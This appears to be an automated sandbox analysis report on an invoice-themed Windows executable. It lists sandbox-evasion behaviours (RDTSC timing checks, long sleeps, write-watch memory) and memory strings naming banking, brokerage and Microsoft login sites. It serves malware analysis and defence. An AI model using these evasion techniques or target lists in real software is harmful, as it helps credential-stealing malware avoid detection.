Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API/Special instruction interceptor: Address: 5E76E5E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API/Special instruction interceptor: Address: 31D6E5E

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	RDTSC instruction interceptor: First address: 5E3D66E second address: 5E3D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D4DAA198h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	RDTSC instruction interceptor: First address: 319D66E second address: 319D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D522C168h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: 37400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Memory allocated: 37310000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597646	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596202	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595966	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595404	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594786	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594217	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593858	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Window / User API: threadDelayed 8108			Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Window / User API: threadDelayed 1727			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

API coverage: 1.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784	Thread sleep count: 8108 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784	Thread sleep count: 1727 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597646s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597527s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595966s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595404s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594786s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594475s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594338s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -593968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -593858s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00406370 FindFirstFileW,FindClose,	4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597646	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596202	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595966	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595404	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594786	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594217	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593858	Jump to behavior

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
